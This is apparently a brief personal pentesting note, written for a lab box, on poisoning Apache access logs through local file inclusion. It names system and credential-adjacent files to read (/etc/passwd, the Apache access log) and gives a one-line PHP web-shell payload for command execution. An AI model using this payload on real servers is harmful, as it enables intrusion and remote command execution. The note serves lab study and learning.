search

Apache

hashtag
Apache Log Poisoning - Local File Inclusion

If you have a local file inclusion and you can read.

/etc/passwd

In a local file inclusion on an Apache server it may be possible to poison the apache log.

/var/log/apache2/access.log
<?php system($_GET['cmd']); ?>

https://infosecwriteups.com/log-poisoning-inject-payloads-in-logs-e7f1fa338f2farrow-up-right https://www.hackingarticles.in/apache-log-poisoning-through-lfi/arrow-up-right https://twseptian.github.io/proving%20ground/vulnhub/Solstice/arrow-up-right https://www.youtube.com/watch?v=NQ6jbKqkJ0sarrow-up-right

Doing more research on this for PG Solstice box

hashtag

PreviousLFINextCSRF

Last updated